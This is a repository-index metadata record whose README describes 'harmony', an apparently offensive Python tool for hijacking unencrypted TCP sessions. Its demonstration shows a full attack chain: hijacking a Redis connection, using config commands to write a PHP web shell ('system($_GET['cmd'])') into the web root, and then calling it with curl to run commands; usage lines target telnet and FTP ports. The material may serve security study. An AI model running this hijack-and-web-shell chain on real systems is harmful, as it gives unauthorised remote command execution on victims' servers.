{"id":26496270,"url":"https://github.com/spoofimei/harmony","last_synced_at":"2025-03-20T11:33:50.823Z","repository":{"id":220213429,"uuid":"750989167","full_name":"SpoofIMEI/harmony","owner":"SpoofIMEI","description":"A general purpose easy to use TCP hijacking tool","archived":false,"fork":false,"pushed_at":"2025-03-08T15:22:17.000Z","size":25,"stargazers_count":8,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-08T16:25:38.336Z","etag":null,"topics":["cyber-security","low-level-networking","network-security","tcp-hijack","tcp-hijacking-tool"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SpoofIMEI.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-01-31T18:05:13.000Z","updated_at":"2025-03-08T15:22:20.000Z","dependencies_parsed_at":"2025-03-08T16:26:21.560Z","dependency_job_id":"0137ea02-808c-44c4-85f8-cf5b4f80a020","html_url":"https://github.com/SpoofIMEI/harmony","commit_stats":null,"previous_names":["r00tendo/harmony","spoofimei/harmony"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2Fharmony","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2Fharmony/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2Fharmony/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SpoofIMEI%2Fharmony/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SpoofIMEI","download_url":"https://codeload.github.com/SpoofIMEI/harmony/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244605057,"owners_count":20480150,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cyber-security","low-level-networking","network-security","tcp-hijack","tcp-hijacking-tool"],"created_at":"2025-03-20T11:33:50.252Z","updated_at":"2025-03-20T11:33:50.813Z","avatar_url":"https://github.com/SpoofIMEI.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Harmony\nHarmony is a pretty simple general-purpose TCP hijacking tool that can be used to inject custom payloads to a TCP connection via piping it to the program or by manually typing it. It does not work against encrypted connections like HTTPS and SFTP, but it's useful against old or misconfigured services, IOT devices and other server software that for some reason just don't have encryption enabled.\n```\n   ▌▐    ▌▐     ██     ▒▒▒    ░░       ░░  ░     ░   ░      ░   ·       ·      \n   ▌▐    ▌▐    █  █    ▒  ▒   ░ ░     ░ ░         ░    ░          ·   ·        \n   ▌▐▀▀▀▀▌▐   █▄▄▄▄█   ▒▒▒    ░  ░   ░  ░ ░          ░      ░        ·         \n   ▌▐    ▌▐  █      █  ▒  ▒   ░   ░ ░   ░        ░        ░        ·           \n   ▌▐    ▌▐ █        █ ▒   ▒  ░    ░    ░   ░ ░      ░     ░     ·             \n```\n## Demonstration\n```\n Client                               Hacker\n█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█\n█                                    █                                                            █\n█$nc 192.168.1.29 6479               █$python3 harmony.py --target 192.168.1.62:192.168.1.29:6379 █\n█AUTH peter myPassword1sSecure       █Sniffing for a client PSH-ACK...                            █\n█OK                                  █Connection hijacked, type away!                             █\n█                                    █config set dir /var/www/html                                █\n█                                    █OK                                                          █\n█                                    █config set dbfilename test.php                              █\n█                                    █OK                                                          █\n█                                    █set tcprocks \"\u003c?php system($_GET['cmd']); ?\u003e                █\n█                                    █OK                                                          █\n█                                    █save                                                        █\n█                                    █Killing threads and exiting...                              █\n█                                    █                                                            █\n█                                    █$curl 192.168.1.29/test.php?cmd=id                          █\n█                                    █uid=1000(peter) gid=1000(peter)                             █\n█                                    █                                                            █\n█                                    █$▌                                                          █\n█                                    █                                                            █\n█                                    █                                                            █\n█                                    █                                                            █\n█                                    █                                                            █\n█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█\n```\n## Installation\n```\ngit clone https://github.com/SpoofIMEI/harmony\ncd harmony\npip install -r requirements.txt\n```\n\n## Usage\n`python3 harmony.py --target \u003ctarget device IP\u003e:\u003cserver IP\u003e:\u003ctarget server port\u003e`\n\n## Examples\n```\npython3 harmony.py --target 192.168.1.52:192.168.1.24:23\ncat payload.bin |python3 harmony.py --target 192.168.1.39:192.168.1.53:21\n```\n\n## Learn what TCP hijacking is\nhttps://medium.com/@SpoofIMEI/tcp-connection-hijacking-deep-dive-9bbe03fce9a9\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fspoofimei%2Fharmony","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fspoofimei%2Fharmony","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fspoofimei%2Fharmony/lists"}